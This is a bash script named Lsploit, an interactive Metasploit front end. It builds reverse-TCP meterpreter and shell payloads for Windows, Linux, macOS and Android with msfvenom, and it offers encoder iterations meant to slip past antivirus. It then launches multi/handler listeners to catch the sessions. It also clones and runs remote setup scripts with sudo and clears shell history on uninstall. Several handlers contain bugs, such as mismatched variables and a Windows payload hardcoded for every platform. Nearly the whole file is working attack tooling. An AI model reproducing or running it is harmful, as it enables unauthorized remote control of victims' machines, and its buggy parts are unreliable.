#!/bin/bash
# LSPLOIY v1.1 by LYSYyy

version="1.1"


# LOGO #

function logo 
{
clear
echo
echo -e "\e[1;32m ___      _______  _______  ___      _______  ___   _______ "
echo "|   |    |       ||       ||   |    |       ||   | |       |"
echo "|   |    |  _____||    _  ||   |    |   _   ||   | |_     _|"
echo "|   |    | |_____ |   |_| ||   |    |  | |  ||   |   |   |  "
echo "|   |___ |_____  ||    ___||   |___ |  |_|  ||   |   |   |  "
echo "|       | _____| ||   |    |       ||       ||   |   |   |  "
echo "|_______||_______||___|    |_______||_______||___|   |___|  "
echo
echo -e "                   \e[1;93mLsploit v$version by LYSYyy\e[0m             "
echo
}

function advanced
{
	clear
	logo
	echo -e " \e[1;95m[1]\e[39m - Deleting files selected exploit (\e[31m'~/.lsploit/'\e[0m)"
	echo -e " \e[1;95m[2]\e[39m - Deleting files (\e[31m'~/.lsploit/'\e[39m)\e[0m"
	echo -e " \e[1;95m[3]\e[39m - Update"
	echo -e " \e[1;95m[4]\e[39m - Uninstall Lsploit"
	echo
	echo -e " \e[1;31m[0]\e[39m - Back\e[0m"
	echo
	echo -ne "\e[1;31mLsploit\e[21;0m:~# "
	read -e ssetting
	
	if [ $ssetting = "1" ]; then
		logo
		echo -ne "\e[95mPlease enter exploit name:\e[1;39m "
		read -e ename
		
		if [ -e ~/.lsploit/$ename.rc ]; then
			rm ~/.lsploit/$ename*
			logo
			echo -e " \e[1;31m[+]\e[1;39m Files '\e[31m$ename\e[39m' has been removed!\e[0m"
			echo
			read
			advanced
		
		else
			logo
			echo -e "\e[1;31mThe enter name was not found!\e[0m"
			echo
			read
			advanced
		fi
		
	elif [ $ssetting = "2" ]; then
		rm -r ~/.lsploit/*
		logo
		echo -e " \e[1;31m[+]\e[1;39m Content \e[31m'~/.lsploit/'\e[39m has been removed!\e[0m"
		echo
		read
		advanced
		
	elif [ $ssetting = "3" ]; then
		logo
		echo -e " \e[1;32m[+]\e[1;39m Starting...\e[90m"
		echo
		rm -r /Lsploit
		cd /
		git clone https://github.com/LYSYyy/Lsploit.git
		cd /Lsploit
		chmod 755 setup.sh
		echo -e "\e[0m"
		./setup.sh
		exit
		
	elif [ $ssetting = "4" ]; then
		logo
		echo -e "\e[1;95mAre you sure you want to uninstall Lsploit? [Y / N]"
		echo
		echo -ne "\e[1;31mLsploit\e[21;0m:~# "
		read -e uninstall
		
		if [ $uninstall = "Y" ]; then
			logo
			rm -r ~/.lsploit
			rm /bin/lsploit
			history -c
			echo -e " \e[1;31m[+]\e[1;39m Program \e[93mLsploit\e[39m was uninstalled along with the content!\e[0m"
			echo
			read
			exit
			
		elif [ $uninstall = "y" ]; then
			logo
			rm -r ~/.lsploit
			rm /bin/lsploit
			history -c
			echo -e " \e[1;31m[+]\e[1;39m Program \e[93mLsploit\e[39m was uninstalled along with the content!\e[0m"
			echo
			read
			exit
			
		elif [ $uninstall = "N" ]; then
			advanced
			
		elif [ $uninstall = "n" ]; then
			advanced
			
		else
			echo
			echo -e "\e[1;91mBad option!\e[0m"
			echo
			read
			advanced
		fi
		
	elif [ $ssetting = "0" ]; then
		menu
	
	else
		echo
		echo -e "\e[1;91mBad option!\e[0m"
		echo
		read
		advanced
	fi
}

function del_exploit
{
	clear
	echo
	echo -e " \e[1;31m[+]\e[1;39m Currently, this feature is not yet available!\e[0m"
	echo
	read
	menu
}

function connect_exploit
{
	clear
	logo
	echo -e " \e[1;32m[1]\e[39m - Load rc files"
	echo -e " \e[1;32m[2]\e[39m - Load MFC sessions"
	echo -e " \e[1;32m[3]\e[39m - Manual data entry"
	echo
	echo -e " \e[1;31m[0]\e[39m - Back\e[0m"
	echo
	echo -ne "\e[1;31mLsploit\e[21;0m:~# "
	read -e coption
	
	if [ $coption = "1" ]; then
		clear
		logo
		echo -ne "\e[36mPlease enter the full path to the rc file:\e[1;39m "
		read -e path
		clear
		echo
		echo -e "  \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
		msfconsole -q -r $path
		menu
		
	elif [ $coption = "2" ]; then
		clear
		logo
		echo -ne "\e[36mPlease enter the name of the MFC session:\e[1;39m "
		read -e session
		echo
		mfc -c $session
		menu
	
	elif [ $coption = "3" ]; then

		clear
		logo
		echo -ne "\e[36mPlease enter the LHOST:\e[1;39m "
		read -e lhostc
		echo -ne "\e[21;36mPlease enter the LPORT:\e[1;39m "
		read -e lportc
		
		echo
		echo -e "  \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
		echo
		
		touch ~/.lsploit/$lhostc.rc
		echo use exploit/multi/handler > ~/.lsploit/$lhostc.rc
        echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/.lsploit/$lhostc.rc
        echo set LHOST $lhost >> ~/.lsploit/$lhostc.rc
        echo set LPORT $lport >> ~/.lsploit/$lhostc.rc
        echo set ExitOnSession false >> ~/.lsploit/$lhostc.rc
        echo exploit -j >> ~/.lsploit/$lhostc.rc
        
        msfconsole -q -r ~/.lsploit/$lhostc.rc
        
        rm ~/.lsploit/$lhostc.rc
        
        menu
	
    elif [ $copcja = "0" ]; then
    	menu
        
    else
		echo
		echo -e "\e[1;91mBad option!\e[0m"
		echo
		read
		connect_exploit
	fi
}

function win86
{
	clear
	echo
	echo -e " \e[1;32m[+]\e[1;39m Starting create exploit...\e[1;90m"
	echo
	
	if [ -e ~/.lsploit ]; then
		msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport --platform=windows --arch=x86 -f exe > ~/.lsploit/$name.exe
		touch ~/.lsploit/$name.rc
       	echo use exploit/multi/handler > ~/.lsploit/$name.rc
        echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/.lsploit/$name.rc
        echo set LHOST $lhost >> ~/.lsploit/$name.rc
        echo set LPORT $lport >> ~/.lsploit/$name.rc
        echo set ExitOnSession false >> ~/.lsploit/$name.rc
        echo exploit -j >> ~/.lsploit/$name.rc
        
        clear
        logo
        echo -e " \e[1;32m[+]\e[1;39m Exploit was saved in: \e[31m'~/.lsploit/'\e[0m"
        echo
        echo -e "\e[1;32mDo you want to connect with '\e[31m$name\e[32m'? [Y / N]"
        echo
        echo -ne "\e[1;31mLsploit\e[21;0m:~# "
		read -e autoconnect
        
        if [ $autoconnect = "Y" ]; then
        	echo
			echo -e "  \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "y" ]; then
		    echo
			echo -e "  \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "n" ]; then
			menu
		elif [ $autoconnect = "N" ]; then
			menu
		else
			menu
		fi
	else
		mkdir ~/.lsploit
		win86
	fi
}

function win64
{
	clear
	echo
	echo -e "  \e[1;32m[+]\e[1;39m Starting create exploit...\e[1;90m"
	echo
	
	if [ -e ~/.lsploit ]; then
		msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport --platform=windows -f exe > ~/.lsploit/$name.exe
		touch ~/.lsploit/$name.rc
       	echo use exploit/multi/handler > ~/.lsploit/$name.rc
        echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/.lsploit/$name.rc
        echo set LHOST $lhost >> ~/.lsploit/$name.rc
        echo set LPORT $lport >> ~/.lsploit/$name.rc
        echo set ExitOnSession false >> ~/.lsploit/$name.rc
        echo exploit -j >> ~/.lsploit/$name.rc
        
        clear
        logo
        echo -e " \e[1;32m[+]\e[1;39m Exploit was saved in: \e[31m'~/.lsploit/'\e[0m"
        echo
        echo -e "\e[1;32mDo you want to connect with '\e[31m$name\e[32m'? [Y / N]"
        echo
        echo -ne "\e[1;31mLsploit\e[21;0m:~# "
		read -e autoconnect
        
        if [ $autoconnect = "Y" ]; then
			echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "y" ]; then
			echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "n" ]; then
			menu
		elif [ $autoconnect = "N" ]; then
			menu
		else
			menu
		fi
	else
		mkdir ~/.lsploit
		win64
	fi
}

function linux
{
	clear
	echo
	echo -e "  \e[1;32m[+]\e[1;39m Starting create exploit...\e[1;90m"
	echo
	
	if [ -e ~/.lsploit ]; then
		msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf > ~/.lsploit/$name.elf
		touch ~/.lsploit/$name.rc
       	echo use exploit/multi/handler > ~/.lsploit/$name.rc
        echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/.lsploit/$name.rc
        echo set LHOST $lhost >> ~/.lsploit/$name.rc
        echo set LPORT $lport >> ~/.lsploit/$name.rc
        echo set ExitOnSession false >> ~/.lsploit/$name.rc
        echo exploit -j >> ~/.lsploit/$name.rc
        
        clear
        logo
        echo -e " \e[1;32m[+]\e[1;39m Exploit was saved in: \e[31m'~/.lsploit/'\e[0m"
        echo
        echo -e "\e[1;32mDo you want to connect with '\e[31m$name\e[32m'? [Y / N]"
        echo
        echo -ne "\e[1;31mLsploit\e[21;0m:~# "
		read -e autoconnect
        
        if [ $autoconnect = "Y" ]; then
        	echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "y" ]; then
			echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "n" ]; then
			menu
		elif [ $autoconnect = "N" ]; then
			menu
		else
			menu
		fi
	else
		mkdir ~/.lsploit
		linux
	fi
}

function mac
{
	clear
	echo
	echo -e "  \e[1;32m[+]\e[1;39m Starting create exploit...\e[1;90m"
	echo
	
	if [ -e ~/.lsploit ]; then
		msfvenom -p osx/x86/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f macho > ~/.lsploit/$name.macho
		touch ~/.lsploit/$name.rc
       	echo use exploit/multi/handler > ~/.lsploit/$name.rc
        echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/.lsploit/$name.rc
        echo set LHOST $lhost >> ~/.lsploit/$name.rc
        echo set LPORT $lport >> ~/.lsploit/$name.rc
        echo set ExitOnSession false >> ~/.lsploit/$name.rc
        echo exploit -j >> ~/.lsploit/$name.rc
        
        clear
        logo
        echo -e " \e[1;32m[+]\e[1;39m Exploit was saved in: \e[31m'~/.lsploit/'\e[0m"
        echo
        echo -e "\e[1;32mDo you want to connect with '\e[31m$name\e[32m'? [Y / N]"
        echo
        echo -ne "\e[1;31mLsploit\e[21;0m:~# "
		read -e autoconnect
        
        if [ $autoconnect = "Y" ]; then
        	echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "y" ]; then
			echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "n" ]; then
			menu
		elif [ $autoconnect = "N" ]; then
			menu
		else
			menu
		fi
	else
		mkdir ~/.lsploit
		linux
	fi
}

function android
{
	clear
	echo
	echo -e "  \e[1;32m[+]\e[1;39m Starting create exploit...\e[1;90m"
	echo
	
	if [ -e ~/.lsploit ]; then
		msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R > ~/.lsploit/$name.apk
		touch ~/.lsploit/$name.rc
       	echo use exploit/multi/handler > ~/.lsploit/$name.rc
        echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/.lsploit/$name.rc
        echo set LHOST $lhost >> ~/.lsploit/$name.rc
        echo set LPORT $lport >> ~/.lsploit/$name.rc
        echo set ExitOnSession false >> ~/.lsploit/$name.rc
        echo exploit -j >> ~/.lsploit/$name.rc
        
        clear
        logo
        echo -e " \e[1;32m[+]\e[1;39m Exploit was saved in: \e[31m'~/.lsploit/'\e[0m"
        echo
        echo -e "\e[1;32mDo you want to connect with '\e[31m$name\e[32m'? [Y / N]"
        echo
        echo -ne "\e[1;31mLsploit\e[21;0m:~# "
		read -e autoconnect
        
        if [ $autoconnect = "Y" ]; then
        	echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "y" ]; then
			echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "n" ]; then
			menu
		elif [ $autoconnect = "N" ]; then
			menu
		else
			menu
		fi
	else
		mkdir ~/.lsploit
		linux
	fi
}

function win86c
{
	clear
	echo
	echo -e "  \e[1;32m[+]\e[1;39m Starting create exploit...\e[1;90m"
	echo
	
	if [ -e ~/.lsploit ]; then
		msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport --platform=windows --arch=x86 -e $encoder -i $iterations -f exe > ~/.lsploit/$name.exe
		touch ~/.lsploit/$name.rc
       	echo use exploit/multi/handler > ~/.lsploit/$name.rc
        echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/.lsploit/$name.rc
        echo set LHOST $lhost >> ~/.lsploit/$name.rc
        echo set LPORT $lport >> ~/.lsploit/$name.rc
        echo set ExitOnSession false >> ~/.lsploit/$name.rc
        echo exploit -j >> ~/.lsploit/$name.rc
        
        clear
        logo
        echo -e " \e[1;32m[+]\e[1;39m Exploit was saved in: \e[31m'~/.lsploit/'\e[0m"
        echo
        echo -e "\e[1;32mDo you want to connect with '\e[31m$name\e[32m'? [Y / N]"
        echo
        echo -ne "\e[1;31mLsploit\e[21;0m:~# "
		read -e autoconnect
        
        if [ $autoconnect = "Y" ]; then
        	echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "y" ]; then
			echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "n" ]; then
			menu
		elif [ $autoconnect = "N" ]; then
			menu
		else
			menu
		fi
	else
		mkdir ~/.lsploit
		win86
	fi
}

function win64c
{
	clear
	echo
	echo -e "  \e[1;32m[+]\e[1;39m Starting create exploit...\e[1;90m"
	echo
	
	if [ -e ~/.lsploit ]; then
		msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport --platform=windows -e $encoder -i $iterations -f exe > ~/.lsploit/$name.exe
		touch ~/.lsploit/$name.rc
       	echo use exploit/multi/handler > ~/.lsploit/$name.rc
        echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/.lsploit/$name.rc
        echo set LHOST $lhost >> ~/.lsploit/$name.rc
        echo set LPORT $lport >> ~/.lsploit/$name.rc
        echo set ExitOnSession false >> ~/.lsploit/$name.rc
        echo exploit -j >> ~/.lsploit/$name.rc
        
        clear
        logo
        echo -e " \e[1;32m[+]\e[1;39m Exploit was saved in: \e[31m'~/.lsploit/'\e[0m"
        echo
        echo -e "\e[1;32mDo you want to connect with '\e[31m$name\e[32m'? [Y / N]"
        echo
        echo -ne "\e[1;31mLsploit\e[21;0m:~# "
		read -e autoconnect
        
        if [ $autoconnect = "Y" ]; then
        	echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "y" ]; then
			echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "n" ]; then
			menu
		elif [ $autoconnect = "N" ]; then
			menu
		else
			menu
		fi
	else
		mkdir ~/.lsploit
		win64
	fi
}

function linuxc
{
	clear
	echo
	echo -e "  \e[1;32m[+]\e[1;39m Starting create exploit...\e[1;90m"
	echo
	
	if [ -e ~/.lsploit ]; then
		msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -e $encoder -i $iterations -f elf > ~/.lsploit/$name.elf
		touch ~/.lsploit/$name.rc
       	echo use exploit/multi/handler > ~/.lsploit/$name.rc
        echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/.lsploit/$name.rc
        echo set LHOST $lhost >> ~/.lsploit/$name.rc
        echo set LPORT $lport >> ~/.lsploit/$name.rc
        echo set ExitOnSession false >> ~/.lsploit/$name.rc
        echo exploit -j >> ~/.lsploit/$name.rc
        
        clear
        logo
        echo -e " \e[1;32m[+]\e[1;39m Exploit was saved in: \e[31m'~/.lsploit/'\e[0m"
        echo
        echo -e "\e[1;32mDo you want to connect with '\e[31m$name\e[32m'? [Y / N]"
        echo
        echo -ne "\e[1;31mLsploit\e[21;0m:~# "
		read -e autoconnect
        
        if [ $autoconnect = "Y" ]; then
        	echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "y" ]; then
			echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "n" ]; then
			menu
		elif [ $autoconnect = "N" ]; then
			menu
		else
			menu
		fi
	else
		mkdir ~/.lsploit
		linux
	fi
}

function macc
{
	clear
	echo
	echo -e "  \e[1;32m[+]\e[1;39m Starting create exploit...\e[1;90m"
	echo
	
	if [ -e ~/.lsploit ]; then
		msfvenom -p osx/x86/shell_reverse_tcp LHOST=$lhost LPORT=$lport -e $encoder -i $iterations -f macho > ~/.lsploit/$name.macho
		touch ~/.lsploit/$name.rc
       	echo use exploit/multi/handler > ~/.lsploit/$name.rc
        echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/.lsploit/$name.rc
        echo set LHOST $lhost >> ~/.lsploit/$name.rc
        echo set LPORT $lport >> ~/.lsploit/$name.rc
        echo set ExitOnSession false >> ~/.lsploit/$name.rc
        echo exploit -j >> ~/.lsploit/$name.rc
        
        clear
        logo
        echo -e " \e[1;32m[+]\e[1;39m Exploit was saved in: \e[31m'~/.lsploit/'\e[0m"
        echo
        echo -e "\e[1;32mDo you want to connect with '\e[31m$name\e[32m'? [Y / N]"
        echo
        echo -ne "\e[1;31mLsploit\e[21;0m:~# "
		read -e autoconnect
        
        if [ $autoconnect = "Y" ]; then
        	echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "y" ]; then
			echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "n" ]; then
			menu
		elif [ $autoconnect = "N" ]; then
			menu
		else
			menu
		fi
	else
		mkdir ~/.lsploit
		linux
	fi
}

function androidc
{
	clear
	echo
	echo -e "  \e[1;32m[+]\e[1;39m Starting create exploit...\e[1;90m"
	echo
	
	if [ -e ~/.lsploit ]; then
		msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -e $encoder -i $iterations R > ~/.lsploit/$name.apk
		touch ~/.lsploit/$name.rc
       	echo use exploit/multi/handler > ~/.lsploit/$name.rc
        echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/.lsploit/$name.rc
        echo set LHOST $lhost >> ~/.lsploit/$name.rc
        echo set LPORT $lport >> ~/.lsploit/$name.rc
        echo set ExitOnSession false >> ~/.lsploit/$name.rc
        echo exploit -j >> ~/.lsploit/$name.rc
        
        clear
        logo
        echo -e " \e[1;32m[+]\e[1;39m Exploit was saved in: \e[31m'~/.lsploit/'\e[0m"
        echo
        echo -e "\e[1;32mDo you want to connect with '\e[31m$name\e[32m'? [Y / N]"
        echo
        echo -ne "\e[1;31mLsploit\e[21;0m:~# "
		read -e autoconnect
        
        if [ $autoconnect = "Y" ]; then
        	echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "y" ]; then
			echo
			echo -e " \e[1;32m[+]\e[1;39m Connection starting...\e[0m"
			echo
			msfconsole -q -r ~/.lsploit/$name.rc
			menu
		elif [ $autoconnect = "n" ]; then
			menu
		elif [ $autoconnect = "N" ]; then
			menu
		else
			menu
		fi
	else
		mkdir ~/.lsploit
		linux
	fi
}

function create_exploit
{
	xterm -geometry 80x20+1+300 -hold -e ifconfig &
	logo
	echo -ne "\e[1;32mPlease enter the LHOST:\e[39m "
	read -e lhost
	killall xterm
	echo -ne "\e[1;32mPlease enter the LPORT:\e[39m "
	read -e lport
	
	echo -e "\e[1;32mPlease enter the OS:\e[39m"
	echo
	echo -e " \e[93m[1]\e[39m - Windows x86"
	echo -e " \e[93m[2]\e[39m - Windows x64"
	echo -e " \e[93m[3]\e[39m - Linux"
	echo -e " \e[93m[4]\e[39m - MAC"
	echo -e " \e[93m[5]\e[39m - Android"
	echo
	echo -e " \e[1;31m[0]\e[39m - Back\e[0m"
	echo
	echo -ne "\e[1;31mLsploit\e[21;0m:~# "
	read -e os
	
	if [ $os = "1" ]; then
		osn="win86"
	elif [ $os = "2" ]; then
		osn="win64"
	elif [ $os = "3" ]; then
		osn="linux"
	elif [ $os = "4" ]; then
		osn="mac"
	elif [ $os = "5" ]; then
		osn="android"
	elif [ $os = "0" ]; then
		menu
	else
		echo
		echo -e "\e[1;91mBad option OS!\e[0m" 
		echo
		read
		create_exploit
	fi
	
	echo
	echo -e "\e[1;32mDo you want to use the system \e[31mMSFencode\e[32m? [Y / N]\e[39m"
	echo
	echo -ne "\e[1;31mLsploit\e[21;0m:~# "
	read -e coder
	
	if [ $coder = "Y" ]; then
		xterm -geometry 100x50+1+300 -hold -e msfvenom -l encoders &
		echo
		echo -ne "\e[1;32mPlease enter the encryption name:\e[39m "
		read -e encoder
		killall xterm
		echo
		echo -ne "\e[1;32mPlease enter the number of encryption iterations:\e[39m "
		read -e iterations

		echo
		echo -ne "\e[1;32mPlease enter exploit name:\e[39m "
		read -e name
		
		clear
		logo
		
		echo -e "                           \e[1;32mSUMMARY:\e[39m "
		echo -e "                 --------------------------"
		echo -e "                 Name: '\e[31m$name\e[39m'"
		echo -e "                 OS: '\e[31m$osn\e[39m'"
		echo -e "                 LHOST: '\e[31m$lhost\e[39m'"
		echo -e "                 LPORT: '\e[31m$lport\e[39m'"
		echo -e "                 MSFencoder: '\e[31m$encoder (x$iterations)\e[39m'"
		echo -e "                 --------------------------"
		echo
		echo -e " \e[1;32m[+]\e[1;39m If everything agrees, press ENTER\e[0m"
		read
		echo
		
		if [ $os = "1" ]; then
			win86c
		elif [ $os = "2" ]; then
			win64c
		elif [ $os = "3" ]; then
			linuxc
		elif [ $os = "4" ]; then
			macc
		elif [ $os = "5" ]; then
			androidc
		else
			echo
			echo -e "\e[1;91mBad option OS!\e[0m" 
			echo
			read
			create_exploit
		fi
		
	elif [ $coder = "y" ]; then
		xterm -geometry 100x50+1+300 -hold -e msfvenom -l encoders &
		echo
		echo -ne "\e[1;32mPlease enter the encryption name:\e[39m "
		read -e encoder
		killall xterm
		echo
		echo -ne "\e[1;32mPlease enter the number of encryption iterations:\e[39m "
		read -e iterations

		echo
		echo -ne "\e[1;32mPlease enter exploit name:\e[39m "
		read -e name
		
		clear
		logo
		
		echo -e "                           \e[1;32mSUMMARY:\e[39m "
		echo -e "                 --------------------------"
		echo -e "                 Name: '\e[31m$name\e[39m'"
		echo -e "                 OS: '\e[31m$osn\e[39m'"
		echo -e "                 LHOST: '\e[31m$lhost\e[39m'"
		echo -e "                 LPORT: '\e[31m$lport\e[39m'"
		echo -e "                 MSFencoder: '\e[31m$encoder (x$iterations)\e[39m'"
		echo -e "                 --------------------------"
		echo
		echo -e " \e[1;32m[+]\e[1;39m If everything agrees, press ENTER\e[0m"
		read
		echo
		
		if [ $os = "1" ]; then
			win86c
		elif [ $os = "2" ]; then
			win64c
		elif [ $os = "3" ]; then
			linuxc
		elif [ $os = "4" ]; then
			macc
		elif [ $os = "5" ]; then
			androidc
		else
			echo
			echo -e "\e[1;91mBad option OS!\e[0m" 
			echo
			read
			create_exploit
		fi
		
	elif [ $coder = "N" ]; then

		echo
		echo -ne "\e[1;32mPlease enter exploit name:\e[39m "
		read -e name
		
		clear
		logo
		
		echo -e "                           \e[1;32mSUMMARY:\e[39m "
		echo -e "                 --------------------------"
		echo -e "                 Name: '\e[31m$name\e[39m'"
		echo -e "                 OS: '\e[31m$osn\e[39m'"
		echo -e "                 LHOST: '\e[31m$lhost\e[39m'"
		echo -e "                 LPORT: '\e[31m$lport\e[39m'"
		echo -e "                 --------------------------"
		echo
		echo -e " \e[1;32m[+]\e[1;39m If everything agrees, press ENTER\e[0m"
		read
		echo
		
		if [ $os = "1" ]; then
			win86c
		elif [ $os = "2" ]; then
			win64c
		elif [ $os = "3" ]; then
			linuxc
		elif [ $os = "4" ]; then
			macc
		elif [ $os = "5" ]; then
			androidc
		else
			echo
			echo -e "\e[1;91mBad option OS!\e[0m" 
			echo
			read
			create_exploit
		fi
		
	elif [ $coder = "n" ]; then
	

		echo
		echo -ne "\e[1;32mPlease enter exploit name:\e[39m "
		read -e name
		
		clear
		logo
		
		echo -e "                           \e[1;32mSUMMARY:\e[39m "
		echo -e "                 --------------------------"
		echo -e "                 Name: '\e[31m$name\e[39m'"
		echo -e "                 OS: '\e[31m$osn\e[39m'"
		echo -e "                 LHOST: '\e[31m$lhost\e[39m'"
		echo -e "                 LPORT: '\e[31m$lport\e[39m'"
		echo -e "                 --------------------------"
		echo
		echo -e " \e[1;32m[+]\e[1;39m If everything agrees, press ENTER\e[0m"
		read
		echo
		
		if [ $os = "1" ]; then
			win86c
		elif [ $os = "2" ]; then
			win64c
		elif [ $os = "3" ]; then
			linuxc
		elif [ $os = "4" ]; then
			macc
		elif [ $os = "5" ]; then
			androidc
		else
			echo
			echo -e "\e[1;91mBad option OS!\e[0m" 
			echo
			read
			create_exploit
		fi
	fi
}
	
function menu
{
	echo
	echo -e " \e[1;32m[+]\e[1;39m Starting...\e[0m"
	echo
	service postgresql start
	service metasploit start
	clear
	logo
	
	echo -e " \e[1;32m[1]\e[39m - Create exploit"
	echo -e " \e[1;32m[2]\e[39m - Listening exploit payload"
	echo -e " \e[1;32m[3]\e[39m - Remove running exploit"
	echo -e " \e[1;32m[4]\e[39m - Create MFC session"
	echo -e " \e[1;32m[5]\e[39m - Advanced"
	echo
	echo -e " \e[1;31m[0]\e[39m - Exit\e[0m"
	
	echo 
	echo -ne "\e[1;31mLsploit\e[21;0m:~# "
	read -e setting
	echo
	
	if [ $setting = "1" ]; then
		create_exploit
	
	elif [ $setting = "2" ]; then
		connect_exploit
		
	elif [ $setting = "3" ]; then
		del_exploit
		
	elif [ $setting = "4" ]; then
		if [ -e /bin/mfc ]; then
			mfc
			menu

		else
			clear
			logo
			echo -e " \e[1;91m[+]\e[39m MFC not found!"
			echo
			echo "Do you want to start installing the required program MFC? [Y / N]"
			echo
			echo -ne "\e[1;31mLsploit\e[21;0m:~# "
			read -e mfc
			
			if [ $mfc = "Y" ]; then
				clear
				logo
				echo -e " \e[1;32m[+]\e[1;39m Starting install MFC...\e[21;90m"
				echo
				
				cd /
				sudo git clone https://github.com/LYSYyy/MFC.git
				cd /MFC
				sudo chmod +x setup.sh
				sudo ./setup.sh
				sudo rm -r /MFC
			
				menu
				
			elif [ $mfc = "y" ]; then
				clear
				logo
				echo -e " \e[1;32m[+]\e[1;39m Starting install MFC...\e[21;90m"
				echo
				
				cd /
				sudo git clone https://github.com/LYSYyy/MFC.git
				cd /MFC
				sudo chmod +x setup.sh
				sudo ./setup.sh
				sudo chmod 755 /bin/mfc*
				sudo rm -r /MFC
			
				menu
				
			elif [ $mfc = "N" ]; then
				menu
			elif [ $mfc = "n" ]; then
				menu
			else
				echo
				echo -e "\e[1;91mBad option!\e[0m"
				echo
				read
				menu
			fi
		fi
		
	elif [ $setting = "5" ]; then
		advanced
		
	elif [ $setting = "0" ]; then
		clear
		echo
		echo -e "\e[1;33mGood Bye! :)\e[0m"
		echo
		exit
	
	else
		echo
		echo -e "\e[1;91mBad option!\e[0m"
		echo
		read
		menu
	fi
}

menu
